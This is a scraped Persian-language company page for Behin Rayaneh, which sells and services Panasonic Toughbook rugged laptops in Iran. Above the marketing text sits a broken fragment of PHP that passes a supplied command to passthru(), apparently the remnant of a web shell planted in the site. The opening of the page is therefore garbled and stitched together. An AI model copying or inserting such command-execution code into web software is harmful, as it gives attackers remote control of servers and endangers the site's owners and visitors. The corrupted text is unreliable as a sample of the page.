'; passthru($cmd); echo ''; exit(); } ?>
You are here: Home

Windows®. Life without Walls™. Panasonic recommends Windows 7.

 

 

کار ما فروش و ارائه گارانتی مطمئن لپ تاپ در بازار ایران است. به طور خاص، تخصص ما مشاوره و فروش لپ تاپ های مقاوم و مستحکم ویژه استفاده در مشاغل و شرایط خاص است. در حال حاضر تجارتخانه بهین رایانه تنها مجری مستقیم ارائه لپ تاپ پاناسونیک با مارک تجاری Toughbook در ایران است که با بهره گیری از خدمات پس از فروش شرکت پاناسونیک و تیم تخصصی پشتیبانی و تعمیرات، گارانتی مطمئنی را برای محصولات خود به مشتریان ارئه می کند. اگر چه تجارتخانه بهین رایانه از سال 1386 شکل گرفته است اما حقیقتا تیم فنی تجارتخانه بهین رایانه از دل تجربه شرکت مهندسی بهین سامانه فردا، که از سال 1374 سابقه ای معتبر در طراحي و توليد سيستم هاي کامپيوتري به ویژه سیستم هایی با کاربرد های امنیتی و صنعتی (مثل سیستم های ضبط مکالمات، مرکز تماس های استودیویی و ..) در کارنامه دارد، بر آمده است.

 صداقت در فروش محصولات کارا و مطمئن با قیمت منصفانه و یکسان در کل  بازار به همراه ارائه خدمات پس از فروش مطمئن با روشهایی تازه که مشتری را از آینده محصول آسوده می کند، استراتژي ما براي پيشتازي در اين بازار و  جلب اعتماد مردم است. 

 علاوه بر لپ تاپ های صنعتی فروش لپ تاپ هایی با مصرف شخصی در بازار ایران از طریق نمایندگی های فروش در سطح کشور با قیمت یکسان و خدمات همه جانبه دیگر فعالیت تجارتخانه بهین رایانه است. از سوی دیگر کارشناسان فنی تجارتخانه بهین رایانه بر اساس تجربیات طولانی خود مشاوره های تخصصی در تجهیز سازمان ها و ارگان هایی که قصد دارند از لپ تاپ در شرایط دشوار کاری استفاده کنند ارائه می نمایند.